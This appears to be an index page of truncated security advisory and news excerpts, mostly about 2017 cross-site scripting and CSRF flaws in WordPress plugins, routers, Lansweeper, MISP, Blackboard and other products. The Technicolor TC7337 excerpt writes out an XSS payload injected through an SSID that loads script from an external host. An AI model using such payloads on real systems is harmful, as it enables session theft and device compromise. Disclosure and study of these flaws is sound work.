Product: User Login History Wordpress Plugin - https://wordpress.org/plugins/user-login-history/Vendor: Er Faiyaz AlamTested version: 1.5.2CVE ID: CVE-2017-15867** CVE description **Multiple cross-site scripting (XSS) vulnerabilities in the user-login-history plugin through 1.5.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via

A security researcher discovered a number of embarrassing vulnerabilities in the popular anonymous feedback app Sarahah. The anonymous feedback app Sarahah makes the headlines once again, according to the according to security researcher Scott Helme, the web-based version of the app is plagued with security flaws. Sarahah mobile app allows users to receive a

=============================================- Release date: October 05th, 2017- Discovered by: Giovanni Cerrato, Giovanni Guido and BackBox team- Severity: Medium============================================= I. VULNERABILITY-------------------------Lansweeper XSS vulnerability. II. INTRODUCTION-------------------------Lansweeper an Asset Management and Netw

Details================Software: Content AuditVersion: 1.9.1Homepage: https://wordpress.org/plugins/content-audit/Advisory report: https://security.dxw.com/advisories/csrf-xss-content-audit/CVE: Awaiting assignmentCVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)Description================CSRF/XSS in Content Audit allowing an unauthenticated attacker to do almo

The security researcher Pierre Kim has discovered ten critical zero-day vulnerabilities in D-Link DIR 850L routers and invites users to stop using them. The security researcher Pierre Kim has discovered ten critical zero-day vulnerabilities in routers from networking equipment manufacturer D-Link that open owners to cyber attacks. The flawed devices are the

EE 4GEE Wireless Router - Multiple Security Vulnerabilities Advisory-------------------------------------------------Hardware Version/Model: 4GEE WiFi MBB (EE60VB-2AE8G83).Vulnerable Software Version: EE60_00_05.00_25.Patched Software Version: EE60_00_05.00_31.Product URL:https://shop.ee.co.uk/dongles/pay-monthly-mobile-broadband/4gee-wifi/detailsProof of Co

Document Title:===============Wibu Systems AG CodeMeter 6.50 - Persistent XSS VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2074ID: FB49498Acknowledgements: https://www.flickr.com/photos/vulnerabilitylab/36912680045/http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13754CVE-ID:=======CVE-2017

Hi list,We have found a Stored Cross-site scripting vulnerability in MISP (Malware Information Sharing Platform & Threat Sharing).[Description]Cross-site scripting (XSS) vulnerability in the comments of the events within MISP before 2.4.79 allows remoteattackers to inject arbitrary web script or HTML via a POST request.-----------------------------------

Need to include cross domain resources: The ever growing need of giving a rich user experience to website visitors have made the need for browsers to include cross origin resource. Sometimes these resources can be data, a frame, an image or JavaScript. For example: A website http://example.com can have the following cross origin resources: Data from websit

Document Title:===============BlackBoard LMS 9.1 (9.1.140152.0) Stored XSS/Arbitrary File UploadProduct Description:===============The Learning Management System has changed the way students andeducators interact.Blackboard's LMS solutions offer much more than simple, classroom interaction,they support the entire education experience enabling educators

Cross-Site ScriptingCross-site scripting (XSS) attacks involved the injection of malicious code into trusted websites. One of the traditional uses of XSS is a hacker stealing session cookies in order to impersonate another user. Lately, it has been the malicious act used to spread malware, deface websites, and phish for useful credentials. It occurs wh

Cross-site scripting, or XSS, is a web application attack that attempts to inject malicious code into a vulnerable application. The application isn't at risk during this attack; XSS' main purpose is to exploit the account or user attempting to use the application.There are a few different types of XSS -- such as stored, reflective and others -- but in this a

// Device : Technicolor TC7337// Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html// XSS through SSID : '><script src=//url.co></script> ( Exactly 32bytes u_u )// ^// 5char domains are running | 'src' does not requires quotes ,and passing the URL with ony '//'// out, grab y

-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512☾ Reflected Cross-Site Scripting in IBM Worklight OAuth Server Web Api ☽======== ☾ Table of Contents ☽ ========================================= 0. Overview 1. Detailed Description 2. Proof Of Concept 3. Solution 4. Disclosure Timeline 5. Thanks & Acknowledgements 6. References 7. Credits 8. Legal No

Details================Software: Salutation Responsive WordPress + BuddyPress ThemeVersion: 3.0.15Homepage: https://themeforest.net/item/salutation-responsive-wordpress-buddypress-theme/548199Advisory report: https://security.dxw.com/advisories/stored-xss-salutation-theme/CVE: Awaiting assignmentCVSS: 4.9 (Medium; AV:N/AC:M/Au:S/C:P/I:P/A:N)Description======